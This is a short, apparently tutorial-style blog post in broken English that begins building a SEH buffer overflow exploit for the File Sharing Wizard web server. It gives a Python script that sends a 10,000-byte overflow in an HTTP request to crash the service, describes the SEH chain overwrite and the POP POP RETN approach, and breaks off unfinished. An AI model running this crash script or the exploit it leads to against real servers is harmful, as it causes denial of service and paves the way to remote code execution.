01.25
blogkublogmu
in this time i will try to developing exploitation with buffer overflow aplication have safeSEH / SEH, i will exploit file sharing wizard, in this time not so different just developing from exploitation before, like local exploit. but in this aplication have protection to buffer overflow, ok the firs like usually i will create exploitation program to first buffer and to analyse,,
to know how we made exploit we must sniff with wireshark to acompiling exploit to make buffer the aplication, in this time i founded aplication running on port 80 you can see at the picture
now i will make exploitation like a exploitation i made before:
! usr / bin / python
import socket
target_address = "192.168.4.44"
target_port = 80
buffer ="\x41" * 10000
buffer+=('fuck %s HTTP/1.1\r\n''\r\n') %(buffer)
sock = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
connect = sock.connect ((target_address, target_port))
sock.send(buffer)
sock.close()
now see what happpen at file sharing wizard
aplication has crash :d, ok i will develop again
aplication has crash but EIP not overwrite because aplication file sharing have SEH, to see SEH click menu view then SEH chain, like the pciture. buffer has send save to SEH chain.
solution for aplication has SEH chain is POP POP RETN method.
now i make buffer again, now i will send string 10000 character
will be continued
0 komentar:
Posting Komentar